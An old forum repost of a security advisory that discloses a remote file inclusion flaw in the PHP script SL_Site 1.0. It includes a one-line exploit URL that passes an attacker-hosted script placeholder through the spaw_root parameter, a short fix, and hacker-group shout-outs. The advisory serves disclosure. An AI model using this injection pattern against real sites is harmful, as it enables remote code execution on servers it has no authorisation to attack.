Guest Nemessis Posted April 26, 2008 Report Share Posted April 26, 2008 ---------------------------------------------------------------------------SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : SL_Siteversion : 1.0URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip------------------------------------------------------------------Exploit:~~~~~Variable $spaw_root not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]---------------------------------------------------------------------------Solution :~~~~~~~declare variabel $spaw_root---------------------------------------------------------------------------Shoutz:~~~# Special greetz to my good friend [Oo]# To all members of #h4cky0u and RST [ hTTp://rstcenter.com ]---------------------------------------------------------------------------*/ Quote Link to comment Share on other sites More sharing options...